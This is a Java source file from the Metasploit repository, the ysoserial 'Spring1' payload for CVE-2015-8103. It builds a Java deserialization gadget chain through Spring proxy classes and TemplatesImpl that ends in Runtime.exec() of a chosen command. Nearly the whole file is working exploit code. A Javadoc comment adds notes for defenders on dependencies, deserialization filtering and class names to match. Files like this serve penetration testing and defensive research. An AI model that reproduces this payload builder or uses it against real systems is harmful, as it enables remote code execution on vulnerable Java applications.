GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/Spring1.java
package ysoserial.payloads;
import static java.lang.Class.forName;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Type;
import javax.xml.transform.Templates;
import org.springframework.beans.factory.ObjectFactory;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
/*
Gadget chain:

ObjectInputStream.readObject()
SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.findMethod()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.invokeMethod()
Method.invoke()
Templates(Proxy).newTransformer()
AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
ObjectFactory(Proxy).getObject()
AnnotationInvocationHandler.invoke()
HashMap.get()
Method.invoke()
TemplatesImpl.newTransformer()
TemplatesImpl.getTransletInstance()
TemplatesImpl.defineTransletClasses()
TemplatesImpl.TransletClassLoader.defineClass()
Pwner*(Javassist-generated).<static init>
Runtime.exec()

*/

/**
 * ysoserial payload builder for the Spring gadget chain listed in this file's header comment.
 *
 * <p>{@link #getObject(String)} assembles an object graph from dynamic proxies and reflectively
 * instantiated Spring classes; the root object it returns is a
 * {@code SerializableTypeWrapper$MethodInvokeTypeProvider}. Nothing in this class serializes or
 * deserializes anything itself.
 *
 * <p>Notes for defenders, derived from the names used below and the {@code @Dependencies} list:
 * <ul>
 *   <li>The chain relies on spring-core and spring-beans (declared here as 4.1.4.RELEASE; this
 *       file does not say which other versions behave the same) and on the JDK-internal
 *       {@code com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl} being loadable by the
 *       application that deserializes the data.</li>
 *   <li>The entry point in the header comment is {@code ObjectInputStream.readObject()}, so the
 *       exposure is any native Java deserialization of data from an untrusted source. Avoid that
 *       where possible, or constrain it with an allow-list {@code java.io.ObjectInputFilter}.</li>
 *   <li>Class names worth matching when inspecting serialized streams or writing filter rules:
 *       {@code org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider},
 *       {@code org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler}
 *       and {@code TemplatesImpl}.</li>
 * </ul>
 */
@SuppressWarnings({"restriction", "rawtypes"})
@Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {

    /**
     * Builds the root object of the chain for {@code command}.
     *
     * @param command passed unchanged to {@code Gadgets.createTemplatesImpl}
     * @return a {@code MethodInvokeTypeProvider} instance whose {@code methodName} field has been
     *     set to {@code "newTransformer"}
     * @throws Exception if any reflective lookup, proxy creation or instantiation fails
     */
    public Object getObject(final String command) throws Exception {
        // Innermost element: the TemplatesImpl that the Gadgets helper produces for this command.
        final TemplatesImpl translet = Gadgets.createTemplatesImpl(command);

        // ObjectFactory proxy backed by a one-entry map: "getObject" -> translet.
        final ObjectFactory factoryProxy = Gadgets.createMemoitizedProxy(
                Gadgets.createMap("getObject", translet), ObjectFactory.class);

        // Spring's delegating handler is looked up by name and instantiated reflectively
        // around the factory proxy.
        final Constructor delegatingCtor = Reflections.getFirstCtor(
                "org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
        final InvocationHandler delegatingHandler =
                (InvocationHandler) delegatingCtor.newInstance(factoryProxy);

        // A single proxy that implements both Type and Templates, routed through that handler.
        final Type typeAndTemplatesProxy =
                Gadgets.createProxy(delegatingHandler, Type.class, Templates.class);

        // TypeProvider proxy backed by a one-entry map: "getType" -> the proxy above.
        final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
                Gadgets.createMap("getType", typeAndTemplatesProxy),
                forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

        // The provider is constructed with Object.getClass as its method; only afterwards is
        // the methodName field overwritten, so the stored name differs from the constructor
        // argument.
        final Constructor providerCtor = Reflections.getFirstCtor(
                "org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
        final Object root = providerCtor.newInstance(
                typeProviderProxy, Object.class.getMethod("getClass"), 0);
        Reflections.setFieldValue(root, "methodName", "newTransformer");

        return root;
    }

    /**
     * Command-line entry point; hands this payload class and the arguments to
     * {@code PayloadRunner.run}.
     *
     * @param args forwarded unchanged to {@code PayloadRunner.run}
     * @throws Exception whatever {@code PayloadRunner.run} throws
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(Spring1.class, args);
    }

}